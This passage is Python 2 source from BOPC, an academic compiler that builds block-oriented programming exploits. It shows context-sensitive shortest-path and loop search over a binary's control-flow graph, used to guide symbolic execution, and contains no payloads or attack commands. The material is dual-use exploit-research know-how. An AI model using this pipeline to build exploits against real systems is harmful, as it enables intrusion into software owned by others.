create a banner\n\n\n        # make sure that the file has a unique name, as we can have >1 solutions\n        filename = '%s_%x.%s' % (binary, time.time(), self.__format)\n\n        try:    \n            out = open(filename, 'w')               # create file\n\n            out.write(banner)                       # write banner first\n            out.write(self.__output)                # then output\n            out.close()\n           \n            dbg_prnt(DBG_LVL_1, \"Solution has been saved as '%s'\" % bolds(filename))\n            dbg_prnt(DBG_LVL_2, \"Solution file:\\n%s\" % banner + self.__output)\n\n\n            dbg_prnt(DBG_LVL_2, \"Waiting for a second to prevent solutions with the same timestamp...\")\n            time.sleep(1)                           # prevent solutions with the same filename\n            \n        except IOError, err:\n            error(\"Cannot create output file: %s\" % str(err))\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/path.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# path.py:\n#\n# This module is the \"assistant\" of the Symbolic Execution engine. Clearly, the unrestricted usage\n# of symbolic execution can cause BOPC to run forever (a bottleneck). To address this problem,\n# we aim to restrict the Symbolic Execution as much as possible. So, instead of letting the\n# Symbolic Execution engine use its built-in BFS for path exploration, we find out (i.e., guess)\n# the exact path(s) and we _guide_ the Symbolic Execution engine to strictly follow them.\n# Therefore, we avoid the exponential growth of the states.\n#\n# In case the recommended path does not work out (due to unsatisfiable constraints), we\n# need to try another path, and so on. In the worst case, we will try all the paths and the result\n# will be the same as the unguided Symbolic Execution. 
Having a way to quickly generate candidate\n# paths is crucial here.\n#\n# The trick here is to \"rank\" the paths, starting from the one that is most likely to succeed. A\n# good metric here is the path length in the CFG (shortest paths in the CFG are not like shortest\n# paths in normal graphs, due to context sensitivity). Therefore, we start with the shortest path\n# first, then we move on to the second shortest path, and so on.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n# [1]. Implement Lawler's modification in k_shortest_paths() to avoid duplicates (or use Eppstein's\n#      algorithm to deal with looping paths).\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport networkx as nx\nimport Queue as queue                               # Python 2 name of the queue module\nimport heapq\nimport traceback\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n_NULL_NODE   = -1                                   # null (non-existent) node\n_SINK_NODE   = 0                                    # the sink node in delta graph\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _queue_obj: This class is the wrapper object that is used in the priority queue.\n#\nclass _queue_obj( object ):\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. 
Simply initialize class members.\n    #\n    # :Arg data: Object's data\n    # :Arg weight: Object's weight (used for the comparisons)\n    #\n    def __init__( self, data, weight ):\n        self.weight = weight\n        self.data   = data\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __cmp__(): Overloaded operator for object comparison.\n    #\n    # :Arg other: The other object to compare.\n    # :Ret: Function returns a <0 value if self.weight < other.weight, 0 if \n    #       self.weight == other.weight and a >0 value if self.weight > other.weight.\n    #\n    def __cmp__( self, other ):\n        return cmp(self.weight, other.weight)\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _cs_ksp_intrl: This class finds the k shortest context sensitive loopless paths with non-negative\n#   edge costs from a single source to a single destination using Yen's algorithm as described in\n#   [1]. The algorithm first finds the shortest path (using any of the well-known algorithms) and\n#   then it finds K-1 deviations of the shortest path.\n#\n#   The problem here is that shortest paths are CFG shortest paths and therefore they are context\n#   sensitive. Thus, we have to modify the existing algorithm. TODO: rewrite\n#\n#\n# [1]. Yen, Jin Y. 
\"Finding the k shortest loopless paths in a network.\" Management Science \n#       17.11 (1971): 712-716.\n#\nclass _cs_ksp_intrl( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __get_precall_stack(): This function calculates the \"precall\" stack for a given node in a\n    #       path. The precall stack is like the regular call stack, but instead of storing the\n    #       return address for every function call, it stores the caller's address (we do this as\n    #       it's more convenient to work with). The precall stack is the \"context\" of the current\n    #       node.\n    #\n    # :Arg path: A path as a list\n    # :Arg node: The given node to retrieve the pre-call stack for\n    # :Ret: The pre-call stack for the given node.\n    #\n    def __get_precall_stack( self, path, node=None ):\n        pcallstack = []\n\n\n        for u, v in to_edges(path):                 # for every edge on the path          \n            if u == node: break                     # if you have reached the target node, stop\n\n            # we can do this, because path is not malformed\n            # get the jump kind of the edge in CFG\n            if self.__G.has_edge(self.__f(u), self.__f(v)):\n                jumpkind = self.__G.get_edge_data(self.__f(u), self.__f(v))['jumpkind']\n            else:\n                error(\"Edge (0x%x -> 0x%x) is missing from the CFG\" % (u, v))\n\n            # push on calls, pop on returns (as a regular stack works)\n            if   jumpkind == 'Ijk_Call': pcallstack.append(u)\n            elif jumpkind == 'Ijk_Ret':  pcallstack.pop()\n\n\n        return pcallstack                         
  # return the precall stack\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor. \n    #\n    # :Arg graph: Graph to work on\n    # :Arg shortest_path_cb: A callback function for calculating shortest paths\n    # :Arg f: A lambda function to transform nodes before they are used as \"indices\" in the graph\n    #\n    def __init__( self, graph, shortest_path_cb, f ):\n        self.__G             = graph                # simply store arguments locally\n        self.__shortest_path = shortest_path_cb\n        self.__f             = f\n\n    \n\n    # ---------------------------------------------------------------------------------------------\n    # k_shortest_paths(): As the name suggests, this function finds the k shortest loopless paths.\n    #       The only issue here is that Yen's algorithm can return duplicate paths. We can fix this\n    #       issue by implementing \"Lawler's modification\". The algorithm also uses an optimization:\n    #       Instead of removing edges and nodes from the graph and adding them later, we simply\n    #       \"mark\" them and we instruct the shortest path algorithm to explicitly avoid them\n    #       during search. \n    #\n    # :Arg source: The source node\n    # :Arg destination: The destination node\n    # :Arg cur_uid: UID of the SPL statement that is about to execute\n    # :Arg K: The number of paths to search for\n    # :Ret: This function is actually a generator. 
Every time it's invoked, it returns a tuple \n    #       (cost, path) that contains the cost of the next shortest path along with that path.\n    #       If such a path does not exist, the function returns (-1, []).\n    #\n    def k_shortest_paths( self, source, destination, cur_uid, K ):\n        assert( K > 0 )                             # we should search for at least 1 path\n\n        source      = int(source)                   # source and destination may be 'long'\n        destination = int(destination)\n\n\n        # find the first shortest path (along with its auxiliary information)\n        path, pathlens, expaths = self.__shortest_path( source, destination, cur_uid )        \n        length = pathlens[-1]\n\n\n        if length < 0 or length == INFINITY:        # if path doesn't exist, stop\n            return\n\n        yield length, expaths[-1]                   # start with the shortest expanded path\n\n\n        # NOTE: We start to work with path and not with expaths[-1]. If path has cycles,\n        # then we may return the same path more than once. Not a big deal though.       
\n\n        A = [path]                                  # the k shortest paths\n        B = []                                      # heap for next potential shortest path\n        L = [ pathlens[:] ]                         # additional tables for previous path lengths\n        E = [ expaths[:]  ]                         # and previous expanded paths\n\n        prev_expaths = [ expaths[-1][:] ]           # remember all previous expanded paths\n    \n\n        # -------------------------------------------------------------------------------\n        # Each iteration finds the next shortest path\n        # -------------------------------------------------------------------------------   \n        for k in range(1, K):                       # for each shortest path deviation\n\n            # spur node ranges from the first to one before the last node in the previous (k-1) path\n            for i in range(0, len(A[k-1]) - 1):\n                spur = A[k - 1][i]                  # pick a spur node\n\n                # root path: Path from the source to the spur node of the (k-1) path\n                rootpath    = A[k-1][:i+1]\n                rootpathlen = L[k-1][i]\n\n                \n                # Now it's time for our optimization: Instead of removing edges and nodes, we\n                # set the \"avoid\" attribute on them and explicitly instruct the shortest path\n                # algorithm to avoid them during search. 
The \"avoid\" operation has to be \n                # context sensitive.\n\n                for p in A:                         # for each previous path\n                    if len(p) > i and rootpath == p[:i+1]:\n                        # \"remove\" edge\n                        self.__G[ self.__f(p[i]) ][ self.__f(p[i+1]) ][ 'avoid' ] = \\\n                                    self.__get_precall_stack(p, p[i])\n  \n                    # print '\\tDROP EDGE', self.__f(p[i]), self.__f(p[i+1]), self.__get_precall_stack(p, p[i])\n\n\n\n                for node in rootpath[:-1]:          # for each node in rootpath (except spur node)\n                    # \"remove\" node\n                    self.__G.node[ self.__f(node) ][ 'avoid' ] = \\\n                                self.__get_precall_stack(rootpath, node)\n\n                    # print '\\tDROP NODE', self.__f(node), self.__get_precall_stack(rootpath, node)\n\n\n                # calculate spur path from the spur node to the destination\n                # (the rootpath is needed for the case of CFG)\n\n                # this destroys 'depth' and 'path', so we have to precalculate them\n                spurpath, spurpathlens, spurexpaths = \\\n                            self.__shortest_path(spur, destination, cur_uid, self.__get_precall_stack(A[k-1], spur))\n\n\n                # print \"TRY SP\", hex(spur), hex(destination), pretty_list(spurpath)\n                        \n                length = spurpathlens[-1]\n\n\n                # if path exists                \n                if length > 0 and length < INFINITY:\n                    path = rootpath[:-1] + spurpath\n\n                    # append lengths of the root path to the spur path\n                    pathlens = L[k-1][:i] + map(lambda l: l + rootpathlen, spurpathlens)\n\n                    # do the same with expanded (sub)paths\n                    expaths = E[k-1][:i][:]\n\n                               # prepend the root subpath to every 
spur subpath (use [:] to make copies)\n                    for expath in spurexpaths:\n                        if i > 0:\n                            expaths.append( E[k-1][i-1][:] + expath[:] )\n                        else:\n                            expaths.append( expath[:] )\n\n\n                    # Add potential shortest path to the heap\n\n\n                    # Paths that invoke the same function multiple times cause the algorithm\n                    # to return the same path multiple times (because the spur path can visit\n                    # (expand) this function, thus resulting in a new path that is actually the\n                    # same).\n                    #\n                    # To fix that, we look at the expanded paths (where all functions are expanded)\n                    # so we can quickly discard duplicates.\n                    is_unique = True\n\n                    for expath in prev_expaths:     # for each previous expanded path\n                        if not cmp(expath, expaths[-1]):\n                            is_unique = False       # path is not unique. Discard it\n                            break\n\n\n                    # if path is unique, add it to the list and to the heap\n                    if is_unique: \n                        prev_expaths.append(expaths[-1])                 \n                        heapq.heappush(B, (length+rootpathlen, path, pathlens, expaths) )\n\n\n                # print '\\t\\tCLEAR ALL DROPS'\n\n                # add back the edges and nodes that have been \"deleted\" from the graph.                     
\n                # (simply delete \"avoid\" attributes from them)\n                for node, _ in nx.get_node_attributes(self.__G, 'avoid').items(): \n                    del self.__G.node[ node ]['avoid']                  \n            \n                for edge, _ in nx.get_edge_attributes(self.__G, 'avoid').items():                   \n                    del self.__G[ edge[0] ][ edge[1] ]['avoid']\n\n\n            if not B:\n                # if the heap is empty, then there are no spur paths. This is the case when all\n                # spur paths have already been added to A, or when there is no path between source\n                # and destination.\n                break\n                \n            # A[k] = shortest path from heap\n            cost, path, pathlens, expaths = heapq.heappop(B)\n            \n            A.append(path)                          # add path to A\n            L.append(pathlens)                      # add path lengths to L\n            E.append(expaths)                       # add expanded paths to E\n       \n            yield cost, expaths[-1]                 # return next path (expanded version)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # k_shortest_loops(): As the name suggests, this function finds the k shortest loops (cycles)\n    #       starting from a given source. To do that, we find the k shortest paths from the source\n    #       to each source predecessor and we add one more edge to form the cycle. Then, we simply\n    #       select the k shortest cycles (as we can have up to k paths for each predecessor).\n    #\n    # :Arg source: The source node\n    # :Arg cur_uid: UID of the SPL statement that is about to execute\n    # :Arg K: The number of loops to search for\n    # :Ret: This function is actually a generator. Every time it's invoked, it returns a tuple \n    #       (cost, cycle) that contains the cost of the next cycle along with that cycle. 
If such a\n    #       loop does not exist, the function returns (-1, []).\n    #\n    def k_shortest_loops( self, source, cur_uid, K ):        \n        heap = []                                   # heap to store all nodes\n\n        # for each predecessor & for each of the (up to) K shortest paths\n        for destination in ADDR2NODE[source].predecessors:\n            for length, path in self.k_shortest_paths(source,  destination.addr, cur_uid, K):\n                if length != INFINITY:\n\n                    # The last edge that we add might be in a different context (this happens\n                    # when the predecessor edge is a return). If our context is right, the\n                    # precall stack will have 0 or 1 elements. In the 2nd case, that element\n                    # and the source must be a valid edge in the CFG with the \"fakeret\" attribute.\n                    callstack = self.__get_precall_stack(path)\n\n                    if len(callstack) == 1 and \\\n                        not self.__G.has_edge(self.__f(callstack[0]), self.__f(source)):\n                            continue                # loop out of context\n\n\n                    # add the predecessor edge to complete the cycle\n                    heapq.heappush(heap, (length + 1, path + [source]))\n\n\n        # yield the (up to) K minimum cycles\n        while len(heap) > 0 and K > 0:\n            yield heapq.heappop(heap)               # return length, path              \n            K -= 1                                  # decrement K\n\n                  \n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _cfg_shortest_path: This module calculates shortest paths within a CFG. 
Searching for shortest\n#   paths in a CFG is not as simple as searching for shortest paths in a regular graph, as paths\n#   are context sensitive. Let's see a counterexample:\n#\n#                        +              +----------> foo\n#                        |              |             +\n#                    call foo           |             |\n#                        | <----------------+         |\n#                       {B}             |   |         |\n#                        |              |   |         |\n#                        |              |   |         |\n#                       {A}             |   |         |\n#                        |              |   |         |\n#                    call foo +---------+   |         |\n#                        |                  |         v\n#                        v                  +------+ retn\n#\n#   Let's assume that our code doesn't have any loops. This means that it's impossible to move from\n#   {A} to {B} under program execution and hence such a path should not exist. However, if we\n#   apply a classic shortest path algorithm (e.g., Dijkstra), we will find a path that goes from\n#   {A} to foo(), then to the return point of foo() and then to the instruction right after the 1st\n#   call, thus ending up at {B}. The main cause of this issue is that in the CFG, a block with a\n#   retn has an edge to every possible return point and the shortest path algorithm does not take\n#   into consideration the current \"context\".\n#\n#   A naive solution here is to keep track of the current path, using backpointers. Every time we\n#   encounter a return instruction, we move backwards to the point where this function was invoked\n#   and we pick the appropriate edge that takes us to the instruction right after the call.\n#   \n#   The problem with this solution is that it can easily fall into a _deadlock_. For instance,\n#   consider the case where we have two paths in the priority queue. 
The 1st path has visited a few\n#   blocks of some function foo(), and therefore they are marked as visited. Now, the 2nd path\n#   reaches a block that calls foo(). If foo() has already been analyzed, we can simply follow the\n#   \"fakeret\" edge and use foo()'s length (or \"depth\") as edge weight. Unfortunately, we don't know\n#   that (as it's under inspection by the 1st path) and we can't visit it twice, thus creating a\n#   deadlock.\n#\n#\n#   The problem gets even harder when the CFG contains recursive functions (or sets of functions\n#   that form a cycle in the Call Graph). Our approach is to use a variant of Dijkstra's algorithm.\n#   If a function doesn't have any callees, a classic Dijkstra suffices to find out the shortest \n#   paths. Otherwise, we recursively do a Dijkstra for each calling function. Thus, we can get each\n#   function's depth before we continue searching. Finally, we also need a Call Stack to avoid\n#   infinite loops when we analyze recursive functions.\n#\nclass _cfg_shortest_path( _cs_ksp_intrl ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __valid_neighbors(): Given a node, find all \"valid\" neighbors (remember not all edges in CFG\n    #       are valid).\n    #\n    # :Arg node: Node to find its neighbors.\n    # :Ret: A list of all neighbor nodes.\n    # \n    def __valid_neighbors( self, node ):\n        # get all node's neighbors as tuples (node, jumpkind)\n        neighbors = [ (n, self.__G.get_edge_data(node, n)['jumpkind']) \n                        for n in self.__G.neighbors(node) ]\n\n        jumps = [ j for (n,j) in neighbors ]        # isolate jump kinds\n\n   
     # Uncomment the following line to return all targets and behave like a normal BFS:\n        #       return [n for n,_ in neighbors]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #1: syscall\n        # \n        # When a node ends with a syscall, it has 2 edges: One to the node after the \n        # syscall (marked as Ijk_FakeRet) and one to an internal node for the syscall \n        # (marked as Ijk_Sys_syscall). We only care about the 1st case.\n        # -------------------------------------------------------------------------------\n        if   ['Ijk_FakeRet', 'Ijk_Sys_syscall'] == jumps: return [neighbors[0][0]]      \n        elif ['Ijk_Sys_syscall', 'Ijk_FakeRet'] == jumps: return [neighbors[1][0]]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #2: call\n        #\n        # When a node ends with a call, it has 2 edges: One to the function's entry point\n        # (marked as Ijk_Call) and one to the node after the call (marked as Ijk_FakeRet).\n        # If it's the 1st time we visit this function, we use the 1st edge in order to \n        # analyse the function. 
Otherwise, we use the 2nd edge and we set the weight to be\n        # equal to the function's minimum depth (from entry point to the shortest exit).\n        # -------------------------------------------------------------------------------\n        elif ['Ijk_FakeRet', 'Ijk_Call'] == jumps:\n            # return caller function as well (but mark it first)\n            # caller should be returned first\n            return [(neighbors[1][0], 'caller', neighbors[0][0])]\n            \n            '''\n            if neighbors[1][0].addr in self.__depth:                \n                self.__G[ node ][ neighbors[0][0] ]['depth'] = self.__depth[neighbors[1][0].addr]\n                return [neighbors[0][0]]\n            else: \n                return [neighbors[1][0]]\n            '''\n\n        elif ['Ijk_Call', 'Ijk_FakeRet'] == jumps:          \n            # return caller function as well (but mark it first)\n            return [(neighbors[0][0], 'caller', neighbors[1][0])]\n\n            '''\n            if neighbors[0][0].addr in self.__depth:        \n                self.__G[ node ][ neighbors[1][0] ]['depth'] = self.__depth[neighbors[0][0].addr]\n                return [neighbors[1][0]]\n            else:           \n                return [neighbors[0][0]]\n            '''\n\n        elif ['Ijk_Call'] == jumps:\n            # in that case, the return block is missing, so we skip it\n            return [(neighbors[0][0], 'caller', -1)]\n\n\n        # -------------------------------------------------------------------------------\n        # Special Case #3: retn\n        #\n        # In case of a return, we're using back pointers to move backwards in the current\n        # path, until we find a node with an Ijk_FakeRet edge that points to a node in\n        # the return list (the Ijk_Ret edges).\n        #\n        #\n        # UPDATE: In the \"Recursive Dijkstra\" approach, a return block indicates the\n        # end of the search and therefore, we don't have to look for 
the block after\n        # the caller.\n        # -------------------------------------------------------------------------------\n        elif 'Ijk_Ret' in jumps:\n            return []                   # the party stops here....\n\n            '''\n            # get edge's jump kind or None if edge doesn't exist\n            edge = lambda u, v: self.__G.get_edge_data(u, v)['jumpkind'] \\\n                             if self.__G.get_edge_data(u, v) else None\n\n            # get all nodes with Ijk_Ret edges\n            ret = [(n,j) for (n,j) in neighbors if j == 'Ijk_Ret']\n\n            curr  = node\n            depth = 0 \n\n            while curr > 0:                         # while we haven't reached the root\n                # get edges from curr to all return targets\n                caller = [n for n,_ in ret if edge(curr, n) == 'Ijk_FakeRet']\n\n                if caller:                          # caller found!\n                    self.__G[ curr ][ caller[0] ][ 'depth' ] = depth\n                    self.__depth[ prev.addr ] = depth\n\n                    return caller                   # caller is unique                  \n\n                prev = curr                         # ow, move one step back\n                curr = self.__backpointer.get(curr.addr, _NULL_NODE)\n\n                if curr == _NULL_NODE: return []\n\n                # increase function's depth (if there are nested functions, accumulate depth)\n                depth += 1 + self.__G[ curr ][ prev ].get('depth', 0)\n\n\n            # this point should never be reached\n            '''\n        \n\n        # -------------------------------------------------------------------------------\n        # Case #4: Other jumps (Ijk_boring)\n        #\n        # For the rest of the jumps, we keep all edges.\n        # -------------------------------------------------------------------------------   \n        else: return [n for n,_ in neighbors]\n\n\n\n    # 
---------------------------------------------------------------------------------------------\n    ''' # Old Shortest Path algorithm (keep it for reference) #\n\n    # ---------------------------------------------------------------------------------------------\n    # __bfs_variant(): Calculate the shortest paths from root to all final nodes, using a variant\n    #       of the classic Breadth First Search (BFS) algorithm. This algorithm has an extra\n    #       feature: it _avoids_ all the nodes and edges that have the \"avoid\" attribute. In some\n    #       cases we need to find a path that doesn't contain some specific edges/nodes. Thus,\n    #       instead of deleting and adding them later, we simply mark them as \"avoid\" and we\n    #       instruct the algorithm to ignore them during searching.\n    # \n    # :Arg root: node to start searching from\n    # :Arg finals: a list of all target nodes\n    # :Ret: A list of tuples with the length and the path for each final node.\n    #   \n    def __bfs_variant( self, root, finals=[] ):     \n        nleft  = len(finals)                        # number of final nodes\n        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)\n\n        visited              = { }                  # visited nodes\n        visited[ root.addr ] = 0                    # distance from root is 0\n\n        self.__backpointer            = { }         # backpointers      \n        self.__backpointer[root.addr] = _NULL_NODE  # root has no parent\n\n        self.__depth = { }                          # function's min depth\n\n\n        # clear leftovers in CFG from previous calls\n        for n, _ in nx.get_edge_attributes(self.__G,'depth').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['depth']\n\n\n        # -------------------------------------------------------------------------------\n        # start searching\n        # 
-------------------------------------------------------------------------------\n        if 'avoid' in self.__G.node[ root ]:        # if root must be avoided\n            return -1, []                           # abort\n\n\n        Q = queue.Queue()\n        Q.put( root )                               # push root node to the queue\n\n        while not Q.empty():                        # while there are unvisited nodes\n            v = Q.get()                             # get front node\n\n            if v in finals_d:                       # is current node in finals?            \n                nleft -= 1      \n                if nleft <= 0: break                # all final nodes have been found\n\n            for n in self.__valid_neighbors( v ):   # for each neighbor node\n\n\n                # TODO: exclude clobbering nodes\n                \n                # ignore nodes and edges that are marked as \"avoid\"\n                if 'avoid' in self.__G.node[ n ] or 'avoid' in self.__G[ v ][ n ]:\n                    continue\n\n\n                if n.addr not in visited:           # if not visited, push it to the queue\n\n                    self.__backpointer[n.addr] = v  # set backpointer to the parent node\n                    Q.put( n )                      # push node onto the queue\n\n                    # set node's shortest path accordingly                  \n                    visited[n.addr] = visited[v.addr] + 1 + self.__G[ v ][ n ].get('depth', 0)\n\n\n        # -------------------------------------------------------------------------------\n        # Search has finished. 
Extract paths\n        # -------------------------------------------------------------------------------\n        sp = []                                     # list of shortest paths\n\n        for n in finals:                            # for each final node           \n            path = []\n            p = n\n            \n            while p > 0:                            # go all the way up to the root         \n                path.insert(0, int(p.addr) )        # add node to the path (in reverse order)\n                p = self.__backpointer.get(p.addr, -1)\n                \n                \n            # if final node is not visited, set distance to -1\n            sp.append( (visited.get(n.addr, -1), path) )\n            \n        return sp # return list of tuples\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    '''\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __depth_metric(): Determine the metric for measuring function's depth. This function tries\n    #       to estimate the minimum number of distinct basic blocks that should be executed within \n    #       a function. To do that, one should look at the shortest paths from the entry point to\n    #       all final basic blocks (those that end with a return instruction) and select as depth\n    #       the length of the minimum of these (shortest) paths.\n    #\n    #       However this metric might not always work well, as it's very common to make argument \n    #       checks at the very early stages of a function and abort if they do not meet the \n    #       requirements.\n    #   \n    #       To fix that, this function offers 3 metrics: The minimum among the shortest paths, the\n    #       maximum and the median of all shortest paths. 
We leave the final decision up to the \n    #       user.\n    #\n    # :Arg retns: A list of tuples (dist, path) that contains all shortest paths to a final block\n    #             along with their distances\n    # :Ret: Function's depth along with a path (if applicable).\n    #\n    def __depth_metric( self, retns ):\n        if not len(retns): return 0, []\n\n        # getting the median is tricky, so we have to sort all return paths first\n        sorted_retns = sorted(retns[:], key=lambda x: x[0])\n\n        if FUNCTION_DEPTH_METRIC == 'min':                   \n            return sorted_retns[0]\n        \n        elif FUNCTION_DEPTH_METRIC == 'max':            \n            return sorted_retns[-1]\n        \n        elif FUNCTION_DEPTH_METRIC == 'median':\n            return sorted_retns[len(sorted_retns) >> 1]\n\n        else:\n            fatal(\"Invalid value for 'FUNCTION_DEPTH_METRIC'!\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __clob_stmts(): This function finds all SPL statements whose accepted blocks are clobbering\n    #       with a given statement. This is essentially a Depth First Search (DFS) on the Reverse\n    #       Adjacency list (self.__radj) starting from current statement. 
This is due to the time\n    #       sensitivity of the clobbering blocks; that is, a clobbering block becomes truly \n    #       clobbering *after* the execution of some SPL statement.\n    #   \n    # :Arg cur_uid: Current statement's UID\n    # :Ret: Function returns a set of all statement UIDs whose blocks are _effectively_ clobbering.\n    #\n    def __clob_stmts( self, cur_uid ):\n        if not self.__clobbering:           # if clobbering blocks are ignored\n            return set()                    # skip it\n\n        if cur_uid != START_PC and cur_uid not in self.__radj:\n            fatal(\"Statement with uid '%d' is not in the reverse adjacency list\" % cur_uid)\n\n        clobs = set()                       # clobbering (visited) statements\n        stack = [cur_uid]                   # start from root\n\n        while stack:\n            curr = stack.pop()              # get top element of the stack\n\n            if curr not in clobs:\n                clobs.add(curr)             # mark it\n                \n                if curr in self.__radj:     # add reverse neighbors, if any (up to 2)\n                    stack.extend( self.__radj[curr] )\n\n        return clobs                        # return clobbering statement set\n\n\n \n    # ---------------------------------------------------------------------------------------------\n    # __dijkstra_variant_rcsv(): This is the recursive variant of Dijkstra's algorithm that we\n    #       described above.\n    #\n    # :Arg root: node to start searching from\n    # :Arg finals: a list of all target (final) nodes\n    # :Arg precall_stack: Current precall stack\n    # :Arg init_dist: Initial distance to start from (i.e., distance from initial root)\n    # :Ret: Function returns two lists of tuples. The first list contains the length and the path\n    #       for each final node. 
The second list contains the length and the path for each\n    #       return node.\n    #\n    def __dijkstra_variant_rcsv( self, root, finals=[], precall_stack=[], init_dist=0 ):\n        nleft    = len(finals)                      # number of final nodes\n        finals_d = dict((n,0) for n in finals)      # cast to dict to search in O(1)\n\n        Q        = queue.PriorityQueue()            # implement it using a priority queue\n        retn_s   = [ ]                              # return node set\n\n\n        dbg_prnt(DBG_LVL_4, 'Starting recursive Dijkstra at: 0x%x (%s). Pre-call Stack: %s' % \n                 (root.addr, func_name(root.addr), pretty_list(precall_stack, ', ')))\n\n\n        # if root is clobbering, skip it (function is recursive, root may not be the top node)\n        if 'clobbering' in self.__G.node[ root ]:\n                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)\n\n        # if root node must be avoided (in the current context), or if it's already in the\n        # Call Stack, return non-existing path(s).\n        if 'avoid' in self.__G.node[root] and precall_stack == self.__G.node[root]['avoid'] or \\\n            root in self.__callstack:\n                return [(INFINITY, [])]*len(finals), [(INFINITY, [])]*len(finals)\n\n\n        self.__callstack[root] = 1\n        self.__dist[root]      = init_dist          # distance from root \n\n\n        # when function has multiple callers, just keep the 1st one for the shortest path\n        if root not in self.__backpointer:\n            self.__backpointer[root] = -1           # root has no parent\n\n\n        # -------------------------------------------------------------------------------\n        # Main Dijkstra loop\n        # -------------------------------------------------------------------------------\n        Q.put(_queue_obj(root, self.__dist[root]))  # add root to the queue\n\n        while not Q.empty():                        # while there are vertices 
in the queue\n            u = Q.get().data                        # get front node's data\n\n        \n            # print node with minimum cost\n            if self.__backpointer[u] == -1: n, a = '-1', 0xffffffff\n            else: n, a = self.__backpointer[u].name, self.__backpointer[u].addr\n\n            dbg_prnt(DBG_LVL_4, \"\\tSelect min: %3d 0x%x (%s)\\t<-- 0x%x (%s)\" % \n                                    (self.__dist[u], u.addr, u.name, a, n))\n\n\n            # In practice, path lengths are not longer than MAX_ALLOWED_SUBPATH_LEN, as\n            # it's highly unlikely to have satisfiable constraints. Therefore we stop once\n            # a path reaches its upper bound, to speed up our algorithm.\n            if self.__dist[u] > MAX_ALLOWED_SUBPATH_LEN:\n                continue                            # discard current path\n\n\n            if u in finals_d:                       # is current node in finals?                       \n                nleft -= 1\n                if nleft <= 0: break                # all final nodes have been found\n\n            if u.has_return: retn_s.append(u)       # return nodes are needed too\n\n\n\n            # check all (valid) neighbors for the current node\n            for v in self.__valid_neighbors( u ):\n\n                # -----------------------------------------------------------------------\n                # Is current block a caller?\n                # -----------------------------------------------------------------------\n                if isinstance(v, tuple) and v[1] == 'caller':\n\n                    # ignore clobbering nodes\n                    if 'clobbering' in self.__G.node[ v[0] ]:\n                            continue\n\n                    # ignore nodes and edges that are marked as \"avoid\"                \n                    if 'avoid' in self.__G.node[v[0]] and precall_stack == self.__G.node[v[0]]['avoid'] or \\\n                       'avoid' in self.__G[u][v[0]]   and precall_stack 
== self.__G[u][v[0]]['avoid']:\n                            continue\n\n                  \n                    # if function is not yet analyzed\n                    if v[0] not in self.__funcdepth:            \n                        # It is possible that the function is not in __funcdepth but it is still\n                        # visited. This happens when 1) function is recursive or 2) function was\n                        # invoked through a jmp before the call. For instance:\n                        #   \n                        #        .text:0000000000410FC0 cipher_decrypt  proc near\n                        #        .....\n                        #        .text:0000000000411021        mov     context, [rsp+1A8h+var_10]\n                        #        .text:0000000000411029        mov     src, [rsp+1A8h+var_8]\n                        #        .text:0000000000411031        add     rsp, 1A8h\n                        #        .text:0000000000411038        jmp     _memcpy        \n                        #\n                        #        .plt:0000000000403A70 _memcpy         proc near\n                        #        .plt:0000000000403A70        jmp     cs:off_621528\n                        #\n                        #\n                        # In both cases, we don't touch the function if its root is already visited\n                        if self.__dist[v[0]] <= self.__dist[u] + 1:\n                            continue\n\n\n                        # set distance to the root node\n                        self.__dist[v[0]]        = self.__dist[u] + 1\n                        self.__backpointer[v[0]] = u\n\n\n                        # Recursively call Dijkstra for the new function\n                        F, R = self.__dijkstra_variant_rcsv(v[0], finals, 